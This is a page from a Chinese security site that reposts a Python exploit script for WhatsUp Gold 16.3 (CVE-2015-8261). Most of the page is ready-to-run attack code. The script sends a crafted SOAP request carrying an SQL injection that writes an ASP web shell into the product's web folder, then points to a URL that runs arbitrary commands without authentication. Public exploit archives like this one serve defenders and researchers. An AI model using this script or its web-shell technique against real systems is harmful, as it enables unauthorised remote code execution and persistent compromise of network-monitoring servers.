首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 WhatsUp Gold 16.3 - Unauthenticated Remote Code Execution 来源：vfocus.net 作者：Buzanowski 发布时间：2016-01-14   # # Exploit Title: WhatsUp Gold v16.3 Unauthenticated Remote Code Execution # Date: 2016-01-13 # Exploit Author: Matt Buzanowski # Vendor Homepage: http://www.ipswitch.com/ # Version: 16.3.x # Tested on: Windows 7 x86 # CVE : CVE-2015-8261 # Usage: python DroneDeleteOldMeasurements.py <target ip>   import requests import sys   ip_addr = sys.argv[1]   shell = '''<![CDATA[<% response.write CreateObject("WScript.Shell").Exec(Request.QueryString("cmd")).StdOut.Readall() %>]]>'''   sqli_str = '''stuff'; END TRANSACTION; ATTACH DATABASE 'C:\\Program Files (x86)\\Ipswitch\\WhatsUp\\HTML\\NmConsole\\shell.asp' AS lol; CREATE TABLE lol.pwn (dataz text); INSERT INTO lol.pwn (dataz) VALUES ('%s');--''' % shell   session = requests.Session()   headers = {"SOAPAction":"\"http://iDrone.alertfox.com/DroneDeleteOldMeasurements\"","User-Agent":"Mozilla/4.0 (compatible; MSIE 6.0; MS Web Services Client Protocol 2.0.50727.4927)","Expect":"100-continue","Content-Type":"text/xml; charset=utf-8","Connection":"Keep-Alive"}   body = """<?xml version="1.0" encoding="utf-8"?> <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">   <soap:Body>     <DroneDeleteOldMeasurements xmlns="http://iDrone.alertfox.com/">       <serializedDeleteOldMeasurementsRequest><?xml version="1.0" encoding="utf-16"?>         <DeleteOldMeasurementsRequest xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">         <authorizationString>0123456789</authorizationString>         <maxAgeInMinutes>1</maxAgeInMinutes>         <iDroneName>%s</iDroneName>         </DeleteOldMeasurementsRequest></serializedDeleteOldMeasurementsRequest>     </DroneDeleteOldMeasurements>   </soap:Body> </soap:Envelope>""" % sqli_str   response = session.post("http://%s/iDrone/iDroneComAPI.asmx" % ip_addr,data=body,headers=headers) print "Status code:", response.status_code print "Response body:", response.content   print "\n\nSUCCESS!!! Browse to http://%s/NmConsole/shell.asp?cmd=whoami for unauthenticated RCE.\n\n" % ip_addr   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·Konica Minolta FTP Utility 1.0 ·SevOne NMS <= 5.3.6.0 - Remote ·SNScan 1.05 - Scan Hostname/IP ·Amanda <= 3.3.1 - amstar Comma ·Internet Explorer 11.0.9600.18 ·NetSchedScan 1.0 - Crash PoC ·FortiGate OS Version 4.x - 5.0 ·Linux Kernel REFCOUNT Overflow ·Grassroots DICOM (GDCM) 2.6.0 ·Art Systems FluidDraw P5/S5 5. ·TrendMicro node.js HTTP Server ·BlueControl 3.5 SR5 Insecure L   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved